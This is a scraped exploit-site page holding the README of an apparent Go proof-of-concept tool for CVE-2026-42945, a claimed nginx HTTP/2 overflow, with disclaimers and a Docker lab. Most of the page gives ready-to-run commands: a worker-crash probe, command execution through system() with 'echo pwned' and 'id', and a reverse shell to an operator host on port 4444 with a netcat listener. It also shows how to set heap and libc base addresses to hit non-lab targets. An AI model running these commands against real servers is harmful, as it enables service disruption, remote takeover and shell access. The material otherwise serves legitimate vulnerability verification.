Share
## https://sploitus.com/exploit?id=F8BA6D01-09BC-5DB0-A42B-4E563D68898E
# CVE-2026-42945 PoC (Go)

This tool is designed for detecting and exploiting vulnerabilities in the **nginx HTTP/2 implementation (CVE-2026-42945)**. It allows verification of vulnerabilities in a **authorized environment**, assessing the effectiveness of fixes, and replicating PoC behaviors in a controlled experiment environment. Affected versions (rough checks): nginx **0.6.27 – 1.30.0**; **1.30.1+** / **1.31.0+** have been fixed.

---

## āš ļø Disclaimer (Please Read Carefully)

**This repository is intended only for security research, vulnerability verification, and defensive testing.**

1. **Legal Authorization**: You may use this tool only on systems for which you have explicit written authorization, or systems that are completely yours. Scanning, probing, or attacking others’ networks/servers without authorization is illegal. The author and contributors do not assume any legal responsibility.
2. **Risk Assessment**: Using this tool may cause the target service’s worker processes to crash, disrupt services, or cause data corruption. You must assess the impact yourself and verify it in a isolated environment.
3. **No Warranty**: This tool is provided ā€œas isā€. It does not guarantee success in real production environments. Side-channel results **do not equal** RCE. They must be verified independently through file dumping, command execution, or reverse shell techniques.
4. **Ban On Abuse**: This tool must not be used to penetrate unauthorized systems, engage in ransomware attacks, cause damage, mine cryptocurrencies, or for any illegal purposes. Downloading, compiling, or using this tool indicates that you have read and agreed to these terms.
5. **Not Related To NGINX**: This project is an independent research implementation and does not represent the position of NGINX or any vendor. If you do not accept these terms, please **stop using it immediately** and delete this repository.

---

## Functionality Overview

| Mode | Description |
|----|--------------|
| `-check-only` | Connectivity checks, Server headers, rough version detection, PoC endpoint detection |
| `-probe-crash` | Send a overflow probe to cause worker crashes, using side channels for verification |
| `-cmd` | Construct an exploit payload to execute specified commands via `system()` |
| `-shell` | Reverse shell attack (requires `-lhost`; local `nc` required) |
| `-docker` | Batch test local Docker environments (vulnerabilities/vFixed issues) |

---

## Environment Requirements

- **Go** ≄ 1.26 (see `go.mod`)
- Optional: **Docker** + **docker compose** (local testing environment)
- Optional: `make`, `golangci-lint` (development/code checking)
- Verification: The target must expose endpoints required for PoC (e.g., `GET /api/`, `POST /spray`), and the Docker test images are already built with these endpoints.

---

## Limitations and Applicable Environments

| Project | Description |
|----|--------------|
| **Protocol** | Only plaintext HTTP is supported (`net.Dial` + raw HTTP bytes). HTTPS/TLS is not supported. TLS ports like `-port 443` require pre-TLS termination or switching to an HTTP port.**
| **Docker Tests** | The image is `linux/amd64`. The first `docker compose build` requires compiling nginx from source, which takes time. The container uses `setarch -R` to **disable ASLR**, which differs significantly from the production environment.**
| **Apple Silicon** | Local Docker tests run with `platform: linux/amd64`, but they are slower.**
| **Reverse Shell** | `-shell` depends on the local `nc` system. Windows users should manually listen for the reverse shell.**
| **Exploit Verification** | Side channels (worker crashes) **do not equal** RCE. Command-side effects must be verified independently.**

---

## Building

```bash
# Quick build (output goes to bin/, already ignored by .gitignore)
make build-cmd

# Or use Go directly
go build -o ./bin/cve-2026-42945 ./cmd

# View the embedded version
./bin/cve-2026-42945 -version
```

**Release Binary**: Download the corresponding platform’s `cve-2026-42945--` binary from [Releases](https://github.com/RedCrazyGhost/CVE-2026-42945/releases) after the `v*` tag is pushed. ---

## Usage Guide

### Command Line Parameters

```
-target string        Target IP/Hostname (Default: 127.0.0.1)
-port int           Target Port (0=80; commonly used 19321 for Docker vulnerabilities)
-docker            Test local Docker environments (Vulnerabilities: 19321, Fixed: 19331)
-check-only          Only check, no exploit traffic sent
-probe-crash        Overflow probe + worker crash detection
-cmd string         Commands executed via system()
-shell              Reverse shell attack (Requires -lhost)
-lhost string        Local IP for reverse shell
-lport int          Local port for reverse shell (Default: 4444)
-docker-profile    Use deploy/docker to test heap/base addresses
-heap-base string    Heap base address (Hex, e.g. 0x555555659000)
```

```
-libc-base string   libc base address (hexadecimal)
-tries int          Number of heap candidate attempts (default: 10)
-timeout int        Single HTTP timeout (seconds) (default: 5)
-v                Detailed output
-version            Exits with the version information
```

> `-docker` mode **cannot** be used simultaneously with `-cmd` or `-shell`. For single-target exploitation, specify `-port 19321`. 

### 1. Just checking the target

```bash
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only
```

### 2. Crash-side channel (single-target)

```bash
./bin/cve-2026-42945 -port 19321 -probe-crash -v
```

### 3. Comparison with the Docker experimental environment

Start the experimental container first:

```bash
make docker-up
# or
docker compose -f deploy/docker-compose.yml up -d --build
```

> The first build requires compiling nginx, which may take several minutes. After the services in `docker compose ps` are marked as `healthy`, run `make test-lab`. | Service | Port | Description |
|------|------|------|
| vuln | **19321** | nginx 1.30.0 (affected) |
| fixed | **19331** | nginx 1.30.1 (fixed) |

Batch detection:

```bash
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash
```

Or use the `Makefile` shortcuts for targets:

```bash
make test-lab          # check + probe
make cmd-exploit       # write `/tmp/pwned` to vuln and prompt a verification command
```

### 4. Running commands on the Docker vuln (RCE verification)

The experimental container has the highest success rate when **ASLR is disabled** (`setarch -R`) and the `-docker-profile` prefix is used for the base address:

```bash
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# Verify whether the file was written
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned
```

### 5. Reversing the shell

```bash
# Terminal 1: Starting the tool (will attempt to listen on the network in the background)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# If nc is not found, open another terminal to listen manually:
nc -lvnp 4444
```

### 6. Custom memory layout

When the real target’s ASLR, libc version, and Docker settings are inconsistent, you need to leak or guess the base address yourself:

```bash
# The target must have a plaintext HTTP port (not TLS)
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v
```

---

## Result interpretation

- `[+] Side channel: Worker exception`: This only indicates that the worker may crash due to a overflow. It **cannot** be used alone as evidence of successful RCE. **It must be verified additionally**: Check the side effects of the commands (files, processes, `docker exec`, etc.). **Common reasons for failure**: Enabled ASLR, errors with libc/heap offset, unavailable PoC endpoints, WAF/rate limiting, container needs to be restarted. ---

## Project structure

```
cmd/                  Main program entry point
internal/rift/        Detection, payload construction, and exploitation logic
deploy/docker/       nginx 1.30.0 / 1.30.1 experimental image
deploy/docker-compose.yml
.github/workflows/  Multi-platform release builds
```

---

## Development

```bash
make help            # View all `make` targets
make test            # Unit tests
make lint            # golangci-lint
make version         # Display the current build version number
```

### Publishing new versions

```bash
git tag v1.0.0
git push origin v1.0.0
```

---

## References

- Repository:
- CVE: **CVE-2026-42945** (nginx HTTP/2-related vulnerabilities. Please refer to the official announcement.)
- License: [MIT License](LICENSE)
- Security issues: [SECURITY.md](SECURITY.md)

---

## Reminder

**Use this tool only on systems where you have permission to test.** Any misuse by you is not related to the author.